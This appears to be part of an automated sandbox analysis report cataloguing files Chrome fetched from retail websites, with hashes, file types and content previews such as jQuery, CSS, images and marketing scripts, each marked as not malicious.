                                                                                                                                                                                    SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                    SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                    SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1020)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1116
                                                                                                                                                                                    Entropy (8bit):5.044628553595581
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:WWToeeTpUhVanMTdDAWd47Mdt7RedKpJMdN+uBde/lBIP9caP9TP9mLP9eXPlEGd:RJj+jmVjDBIaaVSIEGVdoxNHG
                                                                                                                                                                                    MD5:D486CEF1DBA3AB37799876AC6893A894
                                                                                                                                                                                    SHA1:CDE098463187F72942EDBE19B3BFD9EDC76E1F1B
                                                                                                                                                                                    SHA-256:C858F81C53789910730F476CABAAD798AB3162203A9AEB227BAE8E858C511E41
                                                                                                                                                                                    SHA-512:3F09498F4FAD36B4CA8F7C7B60A43395335BCB34C7E8F566B3372BAFB12199F90AD507684319533A880207824DF6CAAA27130D65E75835D00531F677242FCEA2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("countdown-product")){class Countdown extends HTMLElement{constructor(){super(),this.endDate=new Date(this.dataset.endDate).getTime(),Number(this.endDate)&&window.initLazyScript(this,this.init.bind(this))}init(){this.daysEl=this.querySelector(".js-days"),this.hoursEl=this.querySelector(".js-hours"),this.minsEl=this.querySelector(".js-mins"),this.secsEl=this.querySelector(".js-secs"),this.second=1e3,this.minute=60*this.second,this.hour=60*this.minute,this.day=24*this.hour,this.timer(),this.interval=setInterval(this.timer.bind(this),this.second)}timer(){const timeDiff=this.endDate-new Date;if(timeDiff<0){clearInterval(this.interval);return}const days=Math.floor(timeDiff/this.day),hours=Math.floor(timeDiff/this.hour),mins=Math.floor(timeDiff/this.minute),secs=Math.floor(timeDiff/this.second);this.daysEl.textContent=days,this.hoursEl.textContent=hours-days*24,this.minsEl.textContent=mins-hours*60,this.secsEl.textContent=secs-mins*60}}customElements.define("countdown-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1095)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1201
                                                                                                                                                                                    Entropy (8bit):5.048156361354138
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:FCEZT20VtXTqcFTDSSFzpQbMQ5qqKEZ+AgUpxvxNH+8:0uHB5dmSNQM1nu+AgUvvxNe8
                                                                                                                                                                                    MD5:2CC0993C4980164731A627665851A647
                                                                                                                                                                                    SHA1:1CFFAF6AF9F654307A96C676B9F100475BBCFC6F
                                                                                                                                                                                    SHA-256:3F53FA26C70E546F6DC9648134217BEA784812EF9204E9781C122411D13C4825
                                                                                                                                                                                    SHA-512:10022BD87459353A3DA444E8FBF2B2D834665FE184E479FE26209CEAEF841A884EB48EC880772105B667229D630E4B0C9BA99C50C4B3276BDDC113A140288542
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-tooltip.css?v=55398609335921445441730157903
                                                                                                                                                                                    Preview:.tooltip{position:relative;z-index:1;display:flex;background:none;box-shadow:none;border:0;-webkit-appearance:none;appearance:none;padding:0;margin:0}.tooltip:before{content:"?";font-size:calc(var(--font-body-scale) * 1.4rem);font-weight:700;width:1.8rem;height:1.8rem;display:flex;align-items:center;justify-content:center;border-radius:50%;line-height:0;position:relative;background-color:rgb(var(--color-background));color:rgb(var(--color-foreground));cursor:help;border:1px solid rgb(var(--color-foreground))}[data-tooltip]:before,.tooltip>span{position:absolute;bottom:100%;right:0;margin-bottom:.5rem;max-width:20rem;width:max-content;padding:.85rem 1rem;border-radius:var(--border-radius-base);background:#000000d9;color:var(--color-base-white);text-align:left;display:none;font-size:calc(var(--font-body-scale) * 1.3rem);text-indent:0}.tooltip:focus-visible>span,.tooltip:focus>span,.tooltip:hover>span{display:block}[data-tooltip]{position:relative}[data-tooltip]:hover:before{display:block;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 1400x150, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16832
                                                                                                                                                                                    Entropy (8bit):7.956126596408561
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:WpIIkh0ZtUPX14LnoUZJjZrzUFpI1H1FTCSwAiA9:e4+/z7oUZ4FpeDCyi+
                                                                                                                                                                                    MD5:9EB51EF78F352C4C0D2AE1C14D8A6F2E
                                                                                                                                                                                    SHA1:944AC7448D0E05482342F145EC2E5857D1EA88F9
                                                                                                                                                                                    SHA-256:E2F044D7938481674CCC627E6AE8378A36390F96386F17BF5117842226B22E95
                                                                                                                                                                                    SHA-512:AFABD45CF17A2A2840FB4851E6548C08B1C9090C2CC225C3AC5561D55B02468E229C3241BC4B3FEF296A7606A46BFFC3F6EA6BC9DC3428AD2556B7D96754971E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..........x.."..........1..............................................................5-.!...+&.K...../qVnwn.?4#...%.....l.Ge..n......r..te.)UYL\....WS>Y*f<... $h.b...Fiu....*]..8..x..X.M..[...^+*.,....+=.3...&..u..F\.,[.N..R..7..f......v....Z.X.n\.9...^.\.\.Y.k".........C.}.f{`..X.......l @.Y$Z.....U%1.m.....=..(lq.g...|:%.8.n.vz0...y.="8....]..r.v...tL.:...\....n.t....nT.%B......I..QU.G..!.t.........Q..^r../.g..u..P....uNl.Vx.3.r.XBM4;..]\[....4..\..F...E+3.<h.d[..&.6.,......:e.{.6....+Ccpp...Q/.....`.y...-b.....e..i{.l..x.H..TG.C..=....]..y..#|.9..d.J._ED`.........\......*...R.JU.Z.........Xt"..... ..@.J.P./=....tV..,.....a....:sK|...~Q....r...{Z.G......wR.f.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35301
                                                                                                                                                                                    Entropy (8bit):3.7748863897617997
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:rQkHuObSe7BmwZH4tbF5wXHlTgWcvU2x81mBRsKsXENJGZ8rqjPATxR5RsKsXENZ:pHleNbF0XcvHx8EkXkSATx6XkSATxPv
                                                                                                                                                                                    MD5:C9A4BA641899782E6C3B43A5EEC2533E
                                                                                                                                                                                    SHA1:24994D833EEF58ACAFB01C76B5C4751F089EFF7E
                                                                                                                                                                                    SHA-256:95730D480D39FF79CCBF835A0502F565034ABBB539D7D7F8D73140710E9A5585
                                                                                                                                                                                    SHA-512:3FCF5C9BE7CC24CE83CE2AC6CAE74949831FEB2306DDDE93AB7F1F69B2EF9BF48F92B9E447EB58F47B0713FB239A55378FF936F0DB95132A31D6D0CFE14D66D9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M291.891 239.468C290.041 239.468 288.191 239.468 286.341 239.468C286.341 234.68 286.341 229.783 286.341 224.995C282.315 224.995 278.398 224.995 274.371 224.995C274.371 229.783 274.371 234.68 274.371 239.468C272.521 239.468 270.889 239.468 269.039 239.468C269.039 228.695 269.039 217.922 269.039 207.148C270.78 207.148 272.521 207.148 274.262 207.148C274.262 212.263 274.262 217.378 274.262 222.492C278.289 222.492 282.315 222.492 286.341 222.492C286.341 217.378 286.341 212.372 286.341 207.148C288.3 207.148 290.15 207.148 292 207.148C291.891 217.813 291.891 228.695 291.891 239.468Z" fill="#10595B"/>.<path d="M93.6219 205.842C94.166 205.951 94.9277 206.169 95.7983 206.495C96.1247 206.604 96.6688 206.713 96.9953 206.931C98.0835 207.366 99.0628 207.91 99.9334 208.563C99.4981 209.978 99.0628 211.392 98.5187 212.807C98.3011 212.807 98.1923 212.807 98.1923 212.807C98.1923 212.807 98.0835 2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1789
                                                                                                                                                                                    Entropy (8bit):5.177113566186224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uBG6L4YisqwTNjscsEdBZxCriQb6sL9isUx9ocpOBbS3DXQCzBbdByBQJD:uM6hTZs0BZA+U6wosU/1pOB+3DXHBZBd
                                                                                                                                                                                    MD5:33A4A0842739201FE8D314C6C48BF408
                                                                                                                                                                                    SHA1:1AB8D77E4D86FCA4882F24D9405A673E8EF0FD73
                                                                                                                                                                                    SHA-256:FF1082D7C1F055F71565D47208D92F4D8E4FEA909B02DDFC267D9C05F0E37475
                                                                                                                                                                                    SHA-512:EA2C07B574A7D01120924C956AA934B974143E83EC8C404CC9B5AF890BF268BB05B07F1A5D5505F337C21222D016BA279722658B9C1B3C4C29421DC50118749E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(t,c){const n=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(n){return}if(typeof c!=="function")return;function i(){var t=null;if(window.braze!==undefined){t=window.braze}else if(window.appboy!==undefined){t=window.appboy}return t}function a(){const t=new URL([...document.getElementsByTagName("script")].map(t=>t.src).find(t=>t.includes("braze-cart-script")));const n=new URLSearchParams(t.search);return Object.fromEntries(n.entries())}function s(t,n){const e=decodeURIComponent(t);const r=e.indexOf(n);if(r!==-1){return e.substring(0,r)}return t}function e(t){var n=t+"=";var e=document.cookie.split(";");for(var r=0;r<e.length;r++){var o=e[r];while(o.charAt(0)==" ")o=o.substring(1,o.length);if(o.indexOf(n)==0)return o.substring(n.length,o.length)}return null}function r(e){const r=s(e,"?key=");const o=localStorage.getItem("cart_token");i().getDeviceId(function(t){if(e!=null&&r!=o){localStorage.setItem("cart_token",r);const n=a();c("https://"+n["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):126260
                                                                                                                                                                                    Entropy (8bit):5.479246130446593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RY99WOBK+dyycke5wa0K9K9Ks/uNPIGt4btascq0lY7ajCYGu8yHiIHK3Ilo:RYvWeK+dVj09IKe7yC33So
                                                                                                                                                                                    MD5:CEB6B621E847FFB40A3EDA59F2E19BC5
                                                                                                                                                                                    SHA1:2E5D04EBE65572DF9E3080649CE957A2369D47C3
                                                                                                                                                                                    SHA-256:2CE94B39842C1156A5DDB2A0FEFE140BFC0D7BB646235DEB400321C830036973
                                                                                                                                                                                    SHA-512:DD2A5CC2E29F47C08B86D5CE78B4892D2944658DAC366B9CE97D8B5215E7FD397A8C3CBEEB713C9B5AEE875B2F1704A6943C6A8C2BBC949E04F9240C0CE4FC73
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/wpm/bd9f539ffw0e1474c4pae8b6d69m179c86adm.js
                                                                                                                                                                                    Preview:(()=>{var e={8771:()=>{},3482:function(e,t,n){var r,o,i;!function(s,a){"use strict";o=[n(3550)],void 0===(i="function"==typeof(r=function(e){var t=/(^|@)\S+:\d+/,n=/^\s*at .*(\S+:\d+|\(native\))/m,r=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(n))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(n)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var n=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),r=n.match(/ (\(.+\)$)/);n=r?n.replace(r[0],""):n;var o=t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2172
                                                                                                                                                                                    Entropy (8bit):6.887978278863575
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx40gq7Eie0kbaCWsOCuGcPaGOeTNX+:NBIl/Xrx40gq7EiCbTWs7AaGN1+
                                                                                                                                                                                    MD5:8513096D0226F745C3F11F4B8EF7B878
                                                                                                                                                                                    SHA1:3C1F55B14CFA395921A68851DD6E0864DC66BA1A
                                                                                                                                                                                    SHA-256:3CB41E420E0BC866AA68CC33044988C7AEC8B585E92A47B1A72BE189ADA337CD
                                                                                                                                                                                    SHA-512:2469B8FE0AD74A03E06F983AE9E3603B8497CCD61C3087841ADA6654C6C38BC75A3587FACCED32A1AECE0862823790C2A9C3C3633FC676AE1511E91DD8520BFD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................,........J`.........k#.g....Q...0...._. ..3....WQL.0.&...N.6n....M.Pa..V.trz._./....o7.k..3..l8..S.m....X.Mvr|[..V.............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):30304
                                                                                                                                                                                    Entropy (8bit):7.9798181591839965
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:lFW9XiV2t00eJ6823k8R/j6tZU0l4bU8Zt1AFxeP+4ZrTxXi+Ti5s4buStWelCl0:lmEIzx3lWjNPs64Zr1XDbMZlgqT
                                                                                                                                                                                    MD5:5F04292147791FC7D601D12614BAA193
                                                                                                                                                                                    SHA1:F0504854AE344EB026A8F5E8BECF2529BDF229FB
                                                                                                                                                                                    SHA-256:BA7141B3D82384D4EED47304467B48D7FB50F8ADD979F152A0955F2499303149
                                                                                                                                                                                    SHA-512:7CE871C1D794F52B5B4E4A12421BAF3764553802FDE3764389AA65F9A2C7C6FD89C9825DC2BB05510AA9BAE28221A9C1BE08008E884910C54DFA0C3F8CE4B026
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Enova-Home-Storage-Bins-Fabric-Box-_28Set-of-6_29_61f070b5-a2f3-4a24-8c55-5a02448cd45d.jpg?v=1720024223&width=320
                                                                                                                                                                                    Preview:RIFFXv..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .s...=...*@.@.>9..C"!!.+6. .....N....._..;".X..Bw..O......(.gug_~..w......k..._.^..?.y.z....G._.O...o.~..G...J.....{.g.3...7.k.7...l= .........)?s.W.[..r.'.H..c..z..s....r.6>..e.W._..,.........O..?._\......zN......o`.l>....'.'./.....................u..........]...k.g......~Z...@.......?............?.?.....6......._............'./.?........[.......?.d......C.e.m.]......h.p...........cv-b.D....]..).6..........eW..{H../}..7S.?`7aSr.;.1..z...(RQM....M....o...0G\.kn>HRr.......f..\.&16...~C0..;..~Yy.....X..;..h.6
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (15615)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16743
                                                                                                                                                                                    Entropy (8bit):5.456716758879567
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:FdWjlgyrZ4TGlvOcugdP7eOlOaQ9FWCzS99Dvukw3fvb+QKktIVy+GFdCVSx:aRuStvugdaOa/WN99DpwvvSrktIVyJBx
                                                                                                                                                                                    MD5:FFA66951FFCD1838E763A40AD9376DD0
                                                                                                                                                                                    SHA1:2F56C087AE3D0CE740D0882D487A2CAACC24E75C
                                                                                                                                                                                    SHA-256:03C06A89DC50576D784D066913178797F828BBE0E4364F5F1EF621241ECB0B51
                                                                                                                                                                                    SHA-512:0D4D648945C0A1D14B765615692A7341EAF4C8E60308AA0722068F42FE8693FC8253667A08814C9E70114FCFB679E7F33BE28EFCD2DF6E6756E210412B5D9416
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[734],{7154:function(t){function e(){return t.exports=e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])}return t},t.exports.__esModule=!0,t.exports.default=t.exports,e.apply(this,arguments)}t.exports=e,t.exports.__esModule=!0,t.exports.default=t.exports},6479:function(t,e,n){var r=n(7316);t.exports=function(t,e){if(null==t)return{};var n,o,a=r(t,e);if(Object.getOwnPropertySymbols){var l=Object.getOwnPropertySymbols(t);for(o=0;o<l.length;o++)n=l[o],e.indexOf(n)>=0||Object.prototype.propertyIsEnumerable.call(t,n)&&(a[n]=t[n])}return a},t.exports.__esModule=!0,t.exports.default=t.exports},7316:function(t){t.exports=function(t,e){if(null==t)return{};var n,r,o={},a=Object.keys(t);for(r=0;r<a.length;r++)n=a[r],e.indexOf(n)>=0||(o[n]=t[n]);return o},t.exports.__esModule=!0,t.exports.default=t.exports},4184:function(t,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18946
                                                                                                                                                                                    Entropy (8bit):7.956457155932003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:+Y/4il2vX3BLzGOX1t+5CsUg5rNeP/+qG8nHKN3gYO9jS:+YzlkX3BLDMCo5rO/rG88H
                                                                                                                                                                                    MD5:A8A6EE51D4D49D276FBEEEFBC602795B
                                                                                                                                                                                    SHA1:4A0C7B8B260A355462899FE40EBD9E139FCDAC24
                                                                                                                                                                                    SHA-256:C24F0481C903D566BD837ADFCE3FEE7BDBD8170DD4A9165EF349BA8521ED0C48
                                                                                                                                                                                    SHA-512:E03CE6A4C75F541B67359146A19212FB9C58E01FFFC39DAEFAAD42A08895167BB83F5503F025338DA2C15F5A4C5ECB571A01ED97F37C3DF979BFC0210178D766
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Jewelry.png?v=1719612969&width=320
                                                                                                                                                                                    Preview:RIFF.I..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7312
                                                                                                                                                                                    Entropy (8bit):7.831582303382641
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:wvZpJyOvZ+2RCRQhcVlC7P0lDqcMpOtCKKn19yytcN:OyOvZPoRQulFZqRA/Kn19yytcN
                                                                                                                                                                                    MD5:5EB91D78BD34768BE0A642F484886100
                                                                                                                                                                                    SHA1:E7B376E1243CEB4F548FAC45F3558123935BD4E9
                                                                                                                                                                                    SHA-256:0232EEACC55E8049A968DDCE9054E45CA89EF41BFECCEF20307FD5821BA1206A
                                                                                                                                                                                    SHA-512:AE817E349F166AD6357CC9D3F15169F4D04C496286F07D6DCE55E08B3A598620B554715543E32521585B45C998FCEDA74F45DB28EE31FB8DE64B75A2600E793E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/collections/10-29-24.jpg?v=1730170429&width=800
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...K.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*L...>=..E"!....H0...u_....i^..;....~....C.....L..|............~....Q...f.........w.?..R..?......?u>)...........a..~....{......W..x9....z.....+...p...]>C...b.5..=@...j.]>C...b.5..|8..Zk..z...\..~p...Mt..P4q....R.h..5i..!...1sV....b.5..=@...j.d5...\..|...8..ZvF.4q....O...G...]....1sV.....h..5.w...!...1sV.........\...................lu.N*...,.ny.....p).._Q.e...C.!.{....9.B..$.....sDN..>.@*...&..\W.V[....;(.....(.....3..'w.t"yv...#\A.mF...I....$.....B..]F..G.2B....]>.-..x@G....#2.>.f<...M..D...V.Y.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3595)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3702
                                                                                                                                                                                    Entropy (8bit):5.090190292707225
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:fp8vt5kVjA68xAW+pTQuOavkSCU+rXxNg08:tmNSQU+rBu08
                                                                                                                                                                                    MD5:B7E8DE761A57386B79855ADB5CB19BB2
                                                                                                                                                                                    SHA1:0EB5CA80544A1AD45FDA6B0D8691E26BEC7FED40
                                                                                                                                                                                    SHA-256:3FAC7CC635596E5236B1000AA088FE984D7FD065D7BF63D1428197B346310E24
                                                                                                                                                                                    SHA-512:45F17E07E80764C2302ABB1A66FDA09833B003C1E230E339841E96212BB44FA8BBD8B0419AC66C8F3E26F6B9B6E12CAFDD14E55D8FA3BD0258FC7268C1D1F350
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-collage.css?v=169087997296993984651730157903
                                                                                                                                                                                    Preview:.collage{display:grid;grid-column-gap:15px;grid-row-gap:15px}@media (min-width: 750px){.collage-1 .card-overlay{padding-bottom:45%}}@media (min-width: 990px){.collage-1 .card-overlay{padding-bottom:33.3333%}}.collage-2{display:grid;grid-template-columns:repeat(3,minmax(0,1fr))}.collage-2 .card-overlay{grid-column:span 3}@media (min-width: 750px){.collage-2 .card-overlay{grid-column:span 1;width:100%;max-width:100%;height:460px;padding:0}.collage-2 .card-overlay:nth-child(2){grid-column:span 2}}.collage-3{display:grid;grid-template-columns:repeat(2,minmax(0,1fr))}.collage-3 .card-overlay{width:100%;max-width:100%;grid-column:span 2;padding-bottom:100%}@media (min-width: 750px){.collage-3{display:grid;grid-template-columns:repeat(2,minmax(0,1fr))}.collage-3 .card-overlay{width:100%;max-width:100%;grid-column:span 1;height:280px;padding:0}.collage-3 .card-overlay:nth-child(2){order:-1;grid-column:span 2}}@media (min-width: 990px){.collage-3{grid-template-columns:repeat(4,minmax(0,1fr))}.c
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                    MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                    SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                    SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                    SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnMl5DOrngEaBIFDZFhlU4=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (6320)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6321
                                                                                                                                                                                    Entropy (8bit):5.326460697147914
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:3wdGJ4Oa/que/YhWU4DacT3aVarNlCaaMXiaQ3Kav2PXE:3wdGJ4O2DhWU4DacT3aVaRlCaaMXiaQv
                                                                                                                                                                                    MD5:7D911574AFA6309CCF1F8761E00D24FA
                                                                                                                                                                                    SHA1:1B14998829BA95B20E380B0164451FD631A73977
